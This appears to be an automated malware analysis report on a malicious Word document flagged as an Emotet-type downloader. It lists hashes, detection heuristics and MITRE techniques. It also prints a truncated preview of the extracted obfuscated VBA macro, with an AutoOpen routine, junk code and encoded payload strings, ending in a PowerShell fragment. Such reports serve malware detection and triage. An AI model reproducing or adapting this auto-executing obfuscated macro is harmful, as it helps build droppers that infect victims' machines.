Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6cdde4904be1ea10…

MALICIOUS

Office (OLE)

165.5 KB Created: 2018-04-12 08:30:00 Authoring application: Microsoft Office Word First seen: 2019-12-10
MD5: 4260ef87aba363d73e1ce0e2c14c6719 SHA-1: 80c9fad0e8764a0ff32c40806cdf840c9c394156 SHA-256: 6cdde4904be1ea10b8b66f8595282a680f8a9d2faa3d3bb3c0774da22c33446e
244 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro uses the Shell() function to execute a command, likely to download and run a second-stage payload. The presence of the 'Doc.Malware.Emodldr' ClamAV signature further confirms its malicious nature.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 145645 bytes
SHA-256: 0d7034bc4489b2fde5b39de6f1e9da289045ad38e994a86bbc72dcbf74165873
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 34 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "APVizGouWKrjX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
ZrWQE = CByte(XKhEN)
LrRim = AmwFio
pqunD = Cos(2693 - Oct(77784 + wODzu * OAZmOI - CBool(TEaiZ)))
Application.Run tJLUI + "jXPwwWIQJ" + CPbcXd, YMMcO + TZzzjzHSvu + rMllXT
fDVlU = CByte(ijusm)
uRrWnY = ILkwG
MDhHHY = Cos(77872 - Oct(1975 + CztpIT * VdUaiT - CBool(AqwNV)))
End Sub

Attribute VB_Name = "IvEPKHAz"
Sub nUztH(scwQi)
pGift = CByte(phRJLS)
fGuiiA = Cwqzd
MzHNAw = Cos(75134 - Oct(3962 + pakRN * QHdJi - CBool(bHwwT)))
End Sub
Function TZzzjzHSvu()
On Error Resume Next
jJbZOz = CByte(Zrjuc)
JKiYW = TOTLqP
dFTwEm = Cos(28073 - Oct(4551 + YdjQMr * SGLDv - CBool(hlzbC)))
OawhQizu = VJpSA("uu.uwE2ADEANAA4ADEAYgA0AGUAMwA4ADMANAA5AGYAOQAwADYAZgA1ADQAMAAxADUAMwAyAGYAOAA2ADYAYwBlADIAOQA4ADjKo", 7 + iuZBlf - iuZBlf, 91 + iuZBlf - iuZBlf)
kMzlJS = CByte(JGsbI)
HOlFp = hcpBF
MAYXiA = Cos(57497 - Oct(68904 + ShasZw * hSZiDq - CBool(qwjIVU)))
tjhzm = CByte(EAchk)
hrVaf = IrEomE
pYkUpr = Cos(40275 - Oct(77928 + vaGSXL * nwLPE - CBool(BZjiX)))
qopGlKTAz = VJpSA("2NqNgA1AGUANwA1ADUAZAAyAGEANwAxADYAZQAwADUAYQA4AGUbmT", 4 + uLsGzR - uLsGzR, 47 + uLsGzR - uLsGzR)
qvEwdE = CByte(sUjmpP)
iwvTNc = URsbpq
WLnHUo = Cos(96511 - Oct(6972 + idOZTC * JVzVi - CBool(dNVuj)))
FQkzS = CByte(COhwY)
zurGj = TukEBb
VEWYtZ = Cos(62357 - Oct(42505 + JhJYlG * fOZkz - CBool(NJrRoE)))
cbSnYd = VJpSA("LWNgA2AGYAMwAwAGYAMQA1AGUAOQA2ADEAYwAyADkAMwBkAGIAZAA3AGMAZQAzADQAMAA5AGMANwA2AGEAYQAwAGUAZAA5AD6zW8", 3 + iMUnO - iMUnO, 94 + iMUnO - iMUnO)
UAPIF = CByte(QfqoYs)
ZlJzIG = dEqbr
rqNjbl = Cos(53667 - Oct(36864 + IRASo * koZArP - CBool(czuJh)))
jBPHo = CByte(oQNqFR)
cQDQG = dvbIU
klfLHO = Cos(78972 - Oct(96995 + wQvvkv * PJlZwv - CBool(TEJil)))
ZPGrzC = VJpSA("zLi7u0ADQAYwA2AGYAMgAzADQANgA0ADMAOAA4ADIANABkAGEANQAwADUAYgA1ADQAYwBlAqh", 7 + ZPKnRK - ZPKnRK, 65 + ZPKnRK - ZPKnRK)
bFtvOD = CByte(IFGcQ)
YdzIU = XhjRW
vpjMGz = Cos(68774 - Oct(6924 + RtXAj * hnJDJJ - CBool(WbUwoI)))
tCMzXJ = CByte(Rzzjs)
MVWmWw = ZcfNRi
uhGMG = Cos(23232 - Oct(48858 + uQERo * Fvmwi - CBool(OCTQo)))
tRwRPQIq = VJpSA("whADcLYZKIbr", 3 + DvnWA - DvnWA, 3 + DvnWA - DvnWA)
zPQWw = CByte(slOjtk)
fLEbGi = IrUht
iGJsN = Cos(82195 - Oct(46269 + OJrYRW * DtVCB - CBool(CMJaN)))
dCPujD = CByte(amlMwQ)
JzCvA = iGQKb
qQVfJ = Cos(61545 - Oct(65042 + biWZHX * uGmIL - CBool(DzFnw)))
IjbEPiotzU = VJpSA("iSQiQAOAA5ADMANQBlADYAMwA2AGYAYwA5ADEANwBmAGYAYQBmAGIAZQA1ADMAZABhADcANAAzAGIAYgBmADkAYwAwADMAZABhAGIAOQAwAGQAMWT", 5 + jOGvjc - jOGvjc, 107 + jOGvjc - jOGvjc)
JUWlFT = CByte(NdEGc)
QSbabd = cFjAiB
AmSPs = Cos(21736 - Oct(6255 + iEzQF * KipzKb - CBool(EcWiKK)))
PabSfF = CByte(SvjVm)
MCiSQ = IzEdX
WQFURG = Cos(98612 - Oct(66520 + FMCQlK * lkjEl - CBool(clQDuO)))
wwQJni = VJpSA("YobAGIANABkAGEANgBjAGMAWS.v", 4 + EkWHE - EkWHE, 20 + EkWHE - EkWHE)
vLzDpJ = CByte(zzidWE)
HqfBi = vMTwS
doTENL = Cos(70698 - Oct(85119 + uOwbc * QnGCi - CBool(oVvkBP)))
mqBKE = CByte(kiPjJ)
GMtGm = TkOsGG
FifIwX = Cos(59551 - Oct(12654 + OvpXAJ * nqiXk - CBool(HCwhL)))
VkiCc = VJpSA("@wBlADMAMAA5AGEANwA5AGEAZQA1AGYAMgA1ADkAMgA1ADAANQBkADMAMAA2ADYANgBhAGYAOIuT@7bt", 2 + vjrAk - vjrAk, 72 + vjrAk - vjrAk)
nuuku = CByte(zhEaS)
iSJwz = PjKPb
YiNzb = Cos(56171 - Oct(19162 + LTTDT * uKBbQ - CBool(XYtSw)))
sdNIRM = CByte(GcGoF)
jiwVj = mLJwh
JLIoPX = Cos(51372 - Oct(60400 + VXFRm * nPauz - CBool(TYnvio)))
OViviM = VJpSA("6%3BzAGUAYgA0AGMAZAA5AGMAMQBjADEANgA0AGEANQBmAGYANABlAGYANgA4ADIAZAA1AGEANQ0b", 5 + EjSfB - EjSfB, 71 + EjSfB - EjSfB)
AcjifV = CByte(AQSMj)
awOGs = uMzwi
iqqnU = Cos(86167 - Oct(64698 + lfslsZ * iAWzOL - CBool(WVKhDi)))
FvTFhJ = CByte(HiEkbG)
DSoHz = KWqYtj
sVHvzM = Cos(33935 - Oct(84811 + oiuDbJ * nLOjp - CBool(jldlz)))
chjzjTEi = VJpSA("KH([RuntIme.iNTeroPsErVICES.mARshAL]::PtRToStRinGUNi([RUNtimE.INTEroPSeRVICeS.
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.